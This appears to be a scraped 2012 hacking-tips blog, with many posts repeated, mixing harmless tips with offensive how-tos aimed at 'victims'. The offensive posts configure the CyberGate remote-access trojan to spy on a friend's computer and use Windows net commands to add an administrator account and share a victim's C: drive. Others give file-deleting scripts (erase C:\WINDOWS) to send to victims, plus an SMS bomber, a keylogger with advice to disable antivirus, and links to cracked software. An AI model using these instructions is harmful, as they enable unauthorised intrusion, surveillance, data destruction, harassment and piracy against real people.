Wednesday, 28 November 2012
How to call from skype to mobile for free
skype se mobile per free call karoo unlimited
aur ek tym mien 6 friend se video chat karoo
ye kesey kerna hai bs 1 mint mein
download here link
aur ek tym mien 6 friend se video chat karoo
ye kesey kerna hai bs 1 mint mein
download here link
http://urpcsoft..tumblr..com/ Special/Offer
link ko copy jo extra dot(..com) hai os ko hatam karoo aur url mein post karoo
just remove extra dot(..com) and past url
link ko copy jo extra dot(..com) hai os ko hatam karoo aur url mein post karoo
just remove extra dot(..com) and past url
HOw to Remove Newfolder.exe Virus from your pc
How to Remove Newfolder.exe Virus easily
1. Find out all the locations of the “newfolder.exe” virus.
2. Open the task manager and end the newfolder.exe process running in background.3. Open cmd and then type “dir /a XXX” where XXX is the name of the folder where the virus is.
4. Then type “cd XXX”.
1. Find out all the locations of the “newfolder.exe” virus.
2. Open the task manager and end the newfolder.exe process running in background.3. Open cmd and then type “dir /a XXX” where XXX is the name of the folder where the virus is.
4. Then type “cd XXX”.
5. Delete the file by typing “del name_of_file”.
6. Then remove the whole folder by typing “rmdir /s XXX”.
7. The virus has been removed just see the task manager once again and end the newfolder.exe process running in the background (if any).
8. Restart the system nddddddddd Enjoyyyyyyyy!!!
6. Then remove the whole folder by typing “rmdir /s XXX”.
7. The virus has been removed just see the task manager once again and end the newfolder.exe process running in the background (if any).
8. Restart the system nddddddddd Enjoyyyyyyyy!!!
Youtube tricks
VIDEO NOT AVAILABLE IN UR LOCATION! [HOW TO OVERCOME THIS]
guys, ok smtyms when using youtube.com u may get tht msg. recently i wanted to get the video of PSY's hot new song - gangnam style and i got tht error. here is a quick solution to tht
SOLUTION
when u get tht error msg] just go to ur browser's URL bar.
guys, ok smtyms when using youtube.com u may get tht msg. recently i wanted to get the video of PSY's hot new song - gangnam style and i got tht error. here is a quick solution to tht
SOLUTION
when u get tht error msg] just go to ur browser's URL bar.
#1)copy tht whole youtube URL
#2)paste it in keepvid [dot] com (replace the word dot with (.) facebook
regulations prevent me from writing it the normal way
#3)from there u can choose to play it or download it
#2)paste it in keepvid [dot] com (replace the word dot with (.) facebook
regulations prevent me from writing it the normal way
#3)from there u can choose to play it or download it
remember to share this solution to any one in the same
predicament!
predicament!
Softwares
A net filter software to protect children from inappropriate web content.Control and block certain content from the Internet.Seen the numbers of porn sites on the Internet, parents are sometimes not aware of what their children are on. With Anti-Porn you will have the possibility to control what sites your children are on and at the same time limiting their connection time.
DOWNLOAD FROM THIS LINK:http://en.kioskea.net/download/download-835-anti-porn
System requirements
- Operating Systems: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8 (32/64 bit)
- RAM: 250 MB.
- Processor: Pentium 100 MHz.
- Hard disk: 3.27Mo free space.
Memory Card Hacking
Memory card Password Hack
Follow These Steps: Step1: Install X-Plore in your mobile.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/ Mmcstore
Follow These Steps: Step1: Install X-Plore in your mobile.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/ Mmcstore
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6).
Just check the character between the "?" it is your password ie: 62626 Note: If you have not set the password, then you will not able to gain access to C:/ Sys/Data
Supported devices for X-plore:
Symbian S60 3rd/5th editionNokia: E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E75, E90, N71, N72, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, 3250, 5230, 5235, 5320, 5500, 5530, 5630, 5700, 5730, 5800, 6110, 6120, 6124, 6210, 6220, 6290, 6650, 6710, 6720, 6730, 6760, 6788, 6790, X6, C5-00, C6-00Samsung: SGH i400, i450, i520, i550, i560, G810, L870, I7110, i8510, i8910Son Ericsson: SatioLG: JoY, KT610, KT770 Symbian S60Nokia: 3230, 6260, 6290, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610, N70, N90, Panasonic: X700, X800
download here: http://wfs02.wapka.mobi/ download/e/2/8/ 144972_e2867df8a628f122b0b869dc 9815.zip/28e131265d6ea8fc3ffc/ xplore_symbian_lcg_1_51.zip
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6).
Just check the character between the "?" it is your password ie: 62626 Note: If you have not set the password, then you will not able to gain access to C:/ Sys/Data
Supported devices for X-plore:
Symbian S60 3rd/5th editionNokia: E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E75, E90, N71, N72, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, 3250, 5230, 5235, 5320, 5500, 5530, 5630, 5700, 5730, 5800, 6110, 6120, 6124, 6210, 6220, 6290, 6650, 6710, 6720, 6730, 6760, 6788, 6790, X6, C5-00, C6-00Samsung: SGH i400, i450, i520, i550, i560, G810, L870, I7110, i8510, i8910Son Ericsson: SatioLG: JoY, KT610, KT770 Symbian S60Nokia: 3230, 6260, 6290, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610, N70, N90, Panasonic: X700, X800
download here: http://wfs02.wapka.mobi/
Tuesday, 27 November 2012
How to Hack your friends computer using Cybergate !!!
How to Hack your friends computer using Cybergate !!!
1) Download the Software from this Link; http://www.4shared.com/file/N2GgFZCQ/CyberGate_v1180.html
2)Install Cybergate.
3)After Installation it will ask you for the Password.
Default Password: cybergate
4)Once you have put the password, Click on Login.
You will get the message
CyberGate Station is now unlocked and fully functional.
http://1.bp.blogspot.com/-YNKUBF....PG
After that Add the New User==>>Ok==>>Then Double Click on the User you have Add
http://4.bp.blogspot.com/-gibw5b....PG
7)Now Click on Add.
To get You IP address go to Run==>cmd==>>ipconfig
8)Once you have Added the IP address and Port number go to Installation Tab .
Now Select any one option. where you want to infect your trojan in your Friends computer .
=>Boot:
Select Registry option also .
Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:
Mostly Select the Default Browser.
9)Now go to Message Tab:
Click on Create Server and Save you File ..
After that just give this file to your Friend and when he click on that File you will get the access of his system.
You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System..
Note: You will maintain the Access till you have the same IP assign to your Computer..
1) Download the Software from this Link; http://www.4shared.com/file/N2GgFZCQ/CyberGate_v1180.html
2)Install Cybergate.
3)After Installation it will ask you for the Password.
Default Password: cybergate
4)Once you have put the password, Click on Login.
You will get the message
CyberGate Station is now unlocked and fully functional.
5)After that Click on control Center ==>Start
It will Ask you for the Port Number. You can assign any Port number from 0 to 65535.But remember don't assign well known Ports like 80,21 etc..
6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server http://1.bp.blogspot.com/-YNKUBF....PG
After that Add the New User==>>Ok==>>Then Double Click on the User you have Add
http://4.bp.blogspot.com/-gibw5b....PG
7)Now Click on Add.
After that you will need to add your IP Addresswith the Port number you have add before.
Eg: 192.168.1.1:999 To get You IP address go to Run==>cmd==>>ipconfig
8)Once you have Added the IP address and Port number go to Installation Tab .
Here you will get Different Option.
=>Installation Directory : Now Select any one option. where you want to infect your trojan in your Friends computer .
=>Boot:
Select Registry option also .
Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:
Mostly Select the Default Browser.
9)Now go to Message Tab:
You can display any message on your Friends computer , when he opens your File..
10)Now go to Keylogger Tab: It will give you all the Keystrokes of your Friends computer.
11)Now Directly Create Server: Click on Create Server and Save you File ..
After that just give this file to your Friend and when he click on that File you will get the access of his system.
You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System..
Note: You will maintain the Access till you have the same IP assign to your Computer..
Monday, 26 November 2012
Scary Virus
Make frnds scare for VIRUS
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Then save it as Virus.VBS
and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.
On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.
The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")
Oh in between make sure your victim does not panic and really reformat his harddisk. hahaha :)
and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.
On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.
The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")
Oh in between make sure your victim does not panic and really reformat his harddisk. hahaha :)
Hacking via dos
Hacking via dos
try these following dos commands and use them for hacking
1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online.
2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]
3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead
5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on
6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Hacking via dos
1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online.
2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]
3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead
5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on
6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online.
2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]
3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead
5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on
6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Another Easy way to Create a virus in Computer
Write VIRUS to computer in 2 minutes
1) Creating virus trick
open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name]
1) Creating virus trick
open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name]
create the notepad in c: drive...
2)
Note: but with in seconds harddisk get damaged
create Virus in 5 minutes.......
Very easy but dangerous VirusOk, now, the trick:
The only thing you need is Notepad.
Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...
HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!
be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok
i am not at all responsible for any of the further cause
2)
Note: but with in seconds harddisk get damaged
create Virus in 5 minutes.......
Very easy but dangerous VirusOk, now, the trick:
The only thing you need is Notepad.
Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...
HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!
be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok
i am not at all responsible for any of the further cause
Data Recovery
WHY U SHUD NOT BE CHEATED OVER DATA RECOVERY
these r the reasons why u should not hv to pay money for data recovery coz some of these things u can do urself. here are few pointers. and a downlod links 2 good recovery softwares
5 SIMPLE THINGS U SHUD KNW 1ST.
FACT 1
if eva u accidentally delete a file or lose a file on ur
comp d 1st thing do is STOP using the machine till u can
run a recovery program
REASON WHY
deleting a file does nt remove the file from a comp its alway
s there only the pointer 2 tht file is removed HOWEVA if u
continue using d machine, the space occupied by the file
is re-written making it IMPOSSIBLE 2 recover
FACT 2
if u used a deleting software or file shredder 2 delete the
file its IMPOSSIBLE 2 recover d file no matter wat software u use
REASON WHY
lyk i said files r never deletd only pointers 2 them r so wen u
delete using software a.k.a secure delete n this is wat happens.
the space occupied by tht software is re-rwitten with random 1s and 0s.
FACT 3
physical damage 2 hard disk is possible bt EXTREMELY hard 2 repair n
it needs are pro u will charge u no less thn 4 000 000(YES 4ma).in
uganda here i dnt knw of anybody hu can. if sm1 ask u less he's
jst toying wth ur hard disk
REASON WHY
opening hard disks requires high tech specialised dusty free rooms
(lyk uv seen in moviz) coz once open even 1 speck of dust fries the
disk 4EVA. also no single hard disk is made with standardized parts even
4 the same models.
FACT 4
even when d comp tells u ur file(ms word, doc, photo ziki) is corrupted,
tht does not mean the file is gone so dnt delete it
REASON WHY
most corrupted files are usually intact only tht there parts of d file nt
visible to us called headers which get corrupted so it a comp cnt read the
header it will say FILE CORRUPTED. jst google peograms tht can repair the
file and ur fine
FACT 5
when using password recovery software ALWYZ try 2 avoid using the RESET PASSWORD
option. this ie usually the easiest way to gain back access into the
machine(windows n linux) esp if the hard disk is encrypted
REASON WHY
windows uses the password as a key 2 decrypt data on the hard disky do reseting
the password cud give u access bt ul NEVER read ur old stuff
FILE RECOVERY SOFTWARES
lyk i said there are many of these tools available over the internet
u can tryout these:
http://download.getdata.com/ RecoverMyFiles-Setup.exe
http://www.softwaregeek.com/ mirror.php?sid=53303&index=1
http://www.softwaregeek.com/ mirror.php?sid=65999&index=1
FOR FULL VERSION SOFTWARES
torrents are the best foe geting such programs so if i have utorrent installed
u can get these programs. they are the best recovery tools i know.
http://thepiratebay.se/ torrent/7466257/ Stellar_Phoenix_Windows_Data_Re covery_4.1.0.1
http://thepiratebay.se/ torrent/7290657/ Auslogics_File_Recovery_3.3.0.0 _with_crack
http://thepiratebay.se/ torrent/7372319/ Power_Data_Recovery_Cracked_By_ Dr.IfOff
THTS IT.
remember to share this. Knowlege is a gift and it shud be treated as such!
ope this is helpful.have fun
these r the reasons why u should not hv to pay money for data recovery coz some of these things u can do urself. here are few pointers. and a downlod links 2 good recovery softwares
5 SIMPLE THINGS U SHUD KNW 1ST.
FACT 1
if eva u accidentally delete a file or lose a file on ur
comp d 1st thing do is STOP using the machine till u can
run a recovery program
REASON WHY
deleting a file does nt remove the file from a comp its alway
s there only the pointer 2 tht file is removed HOWEVA if u
continue using d machine, the space occupied by the file
is re-written making it IMPOSSIBLE 2 recover
FACT 2
if u used a deleting software or file shredder 2 delete the
file its IMPOSSIBLE 2 recover d file no matter wat software u use
REASON WHY
lyk i said files r never deletd only pointers 2 them r so wen u
delete using software a.k.a secure delete n this is wat happens.
the space occupied by tht software is re-rwitten with random 1s and 0s.
FACT 3
physical damage 2 hard disk is possible bt EXTREMELY hard 2 repair n
it needs are pro u will charge u no less thn 4 000 000(YES 4ma).in
uganda here i dnt knw of anybody hu can. if sm1 ask u less he's
jst toying wth ur hard disk
REASON WHY
opening hard disks requires high tech specialised dusty free rooms
(lyk uv seen in moviz) coz once open even 1 speck of dust fries the
disk 4EVA. also no single hard disk is made with standardized parts even
4 the same models.
FACT 4
even when d comp tells u ur file(ms word, doc, photo ziki) is corrupted,
tht does not mean the file is gone so dnt delete it
REASON WHY
most corrupted files are usually intact only tht there parts of d file nt
visible to us called headers which get corrupted so it a comp cnt read the
header it will say FILE CORRUPTED. jst google peograms tht can repair the
file and ur fine
FACT 5
when using password recovery software ALWYZ try 2 avoid using the RESET PASSWORD
option. this ie usually the easiest way to gain back access into the
machine(windows n linux) esp if the hard disk is encrypted
REASON WHY
windows uses the password as a key 2 decrypt data on the hard disky do reseting
the password cud give u access bt ul NEVER read ur old stuff
FILE RECOVERY SOFTWARES
lyk i said there are many of these tools available over the internet
u can tryout these:
http://download.getdata.com/
http://www.softwaregeek.com/
http://www.softwaregeek.com/
FOR FULL VERSION SOFTWARES
torrents are the best foe geting such programs so if i have utorrent installed
u can get these programs. they are the best recovery tools i know.
http://thepiratebay.se/
http://thepiratebay.se/
http://thepiratebay.se/
THTS IT.
remember to share this. Knowlege is a gift and it shud be treated as such!
ope this is helpful.have fun
''MORE HACKING'' Introducing to you beaver sms bomber pro
''MORE HACKING'' Introducing to you beaver sms bomber pro
this program will bomb the victim's mobile phone with tons of sms. it supports all major networks and dont worry if your network is not listed you can add it there under custom options. you can also add list of multiple victims and bomb them simultaneously.
download from here
Click Here
this program will bomb the victim's mobile phone with tons of sms. it supports all major networks and dont worry if your network is not listed you can add it there under custom options. you can also add list of multiple victims and bomb them simultaneously.
download from here
Click Here
Sunday, 25 November 2012
What is spotflux?
What is spotflux?
Spot Flux is devoted to protecting your digital privacy and security anywhere and on any device. Our tiny, but powerful application not only encrypts your
Keylogger
Ardamax Keylogger
Download : Ardamax Keylogger
In the taskbar right click on the keylogger and click enter registration key and fill the details below.
Note:-
If you want to uninstall this keylogger via Control panel it uninstalls but it is a Trojan Keylogger so it cant be removed totally from your computer so we provided the removal tool of this tool,by this it can be removed totally from your PC.
Antivirus Detects it so Before Downloading it change your Antivirus settings to that allows this.
If you want to uninstall this keylogger via Control panel it uninstalls but it is a Trojan Keylogger so it cant be removed totally from your computer so we provided the removal tool of this tool,by this it can be removed totally from your PC.
Download : Ardamax remover
Antivirus Detects it so Before Downloading it change your Antivirus settings to that allows this.
Subscribe to:
Posts
(
Atom
)